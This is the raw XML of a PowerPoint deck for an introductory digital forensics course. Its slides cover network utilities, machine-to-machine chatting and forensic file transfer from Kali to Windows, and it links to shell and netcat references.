              <a:ext cx="158675" cy="329225"/>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6" name="Google Shape;316;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6335525" y="1405350"/>
              <a:ext cx="442025" cy="375100"/>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7" name="Google Shape;317;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6059500" y="3516375"/>
              <a:ext cx="268700" cy="232025"/>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8" name="Google Shape;318;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385050" y="4208725"/>
              <a:ext cx="422775" cy="298975"/>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9" name="Google Shape;319;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7121425" y="2437925"/>
              <a:ext cx="246700" cy="315500"/>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20" name="Google Shape;320;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6062250" y="3853825"/>
              <a:ext cx="332900" cy="376025"/>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21" name="Google Shape;321;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6023725" y="3167900"/>
              <a:ext cx="340250" cy="227450"/>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22" name="Google Shape;322;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7109500" y="3449425"/>
              <a:ext cx="154100" cy="165100"/>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grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="323" name="Google Shape;323;p5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133967" y="1375233"/>
            <a:ext cx="8050400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="A4C2F4"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="120825" y="6296983"/>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l"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262371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43062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99356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63717A-E3C1-4BED-ABE0-B7069385E023}"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85891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63717A-E3C1-4BED-ABE0-B7069385E023}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/3/2024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7169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63717A-E3C1-4BED-ABE0-B7069385E023}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/3/2024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60008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3717A-E3C1-4BED-ABE0-B7069385E023}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/3/2024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9640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33090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48037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3717A-E3C1-4BED-ABE0-B7069385E023}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/3/2024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6F5B0-BCF1-4291-802C-4ED5F9057036}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="United States Department of Justice - Wikipedia"/>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1304663" y="6429241"/>
            <a:ext cx="379628" cy="3796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JP PMP Login"/>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1684291" y="6519834"/>
            <a:ext cx="420444" cy="2016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iversity of Baltimore Issues Marketing RFP - PR News"/>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154993" y="6286831"/>
            <a:ext cx="1571896" cy="6644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ile:Towson University logo horiz 2019.png - Wikimedia Commons"/>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1272985" y="6456351"/>
            <a:ext cx="1202235" cy="414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574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customXml" Target="../ink/ink1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customXml" Target="../ink/ink1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20.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.tif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink16.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.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customXml" Target="../ink/ink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39.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink20.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image301.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink25.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image341.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image270.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink22.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image321.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.tif"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink24.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink26.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image291.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image311.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink29.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image330.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink34.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image370.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image300.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink31.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image390.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink33.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink35.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink28.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image320.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink37.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image290.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image340.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image380.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink30.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image360.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image310.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink32.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image400.png"/></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hyperlink" Target="https://en.wikipedia.org/wiki/Standard_streams" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computerhope.com/unix/nc.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.brianstorti.com/understanding-shell-script-idiom-redirec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customXml" Target="../ink/ink5.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId20"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130.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15.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3.xml"/><Relationship Id="rId1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customXml" Target="../ink/ink9.xml"/><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9766" y="2472612"/>
            <a:ext cx="9336833" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Computer Skills for Digital Forensics</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6382139"/>
            <a:ext cx="12192000" cy="475861"/>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itle 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410545" y="477935"/>
            <a:ext cx="11635274"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0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>A-I Vocational Training Institute of Cybersecurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1863012" y="4675673"/>
            <a:ext cx="9336833" cy="23876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Calibri Light" panose="020F0302020204030204"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Prepared by:</a:t>
            </a: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2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>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500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Aminu</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> Idris</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Calibri Light" panose="020F0302020204030204"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>(CCNA, CompTIA Security+, CEH, OSCP, CISSP, CISM)</a:t>
            </a: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4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>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40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2463" y="58591"/>
            <a:ext cx="1311438" cy="1311438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38204970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Network utilities use standard devices </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6470651"/>
            <a:ext cx="732367" cy="387349"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>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518429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Chatting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127425" y="1443234"/>
            <a:ext cx="8795217" cy="5087548"/>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BE5B3CB-0C46-5BFC-C965-C3B23702C669}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10036847" y="3735279"/>
              <a:ext cx="4320" cy="5760"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBE5B3CB-0C46-5BFC-C965-C3B23702C669}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10027847" y="3726639"/>
                <a:ext cx="21960" cy="23400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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416641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Forensic Data Transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="997234" y="1818895"/>
            <a:ext cx="8953541" cy="3706976"/>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FBD06D31-7CAC-5B43-D03B-877056D08B72}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6499847" y="5989599"/>
              <a:ext cx="4320" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD06D31-7CAC-5B43-D03B-877056D08B72}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6490847" y="5980599"/>
                <a:ext cx="219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CCE866D0-3FE2-6B52-B626-F1397DA2AD3D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6641327" y="6123879"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Ink 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE866D0-3FE2-6B52-B626-F1397DA2AD3D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6632687" y="6115239"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>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11612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Your work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6297084"/>
            <a:ext cx="732367" cy="524933"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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933795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Goal : Communication between two machines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="40116" y="2118247"/>
            <a:ext cx="12111769" cy="2621507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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684404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Goal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997233" y="1737116"/>
            <a:ext cx="8187200" cy="3147304"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send files from Kali to Windows 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Zenmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
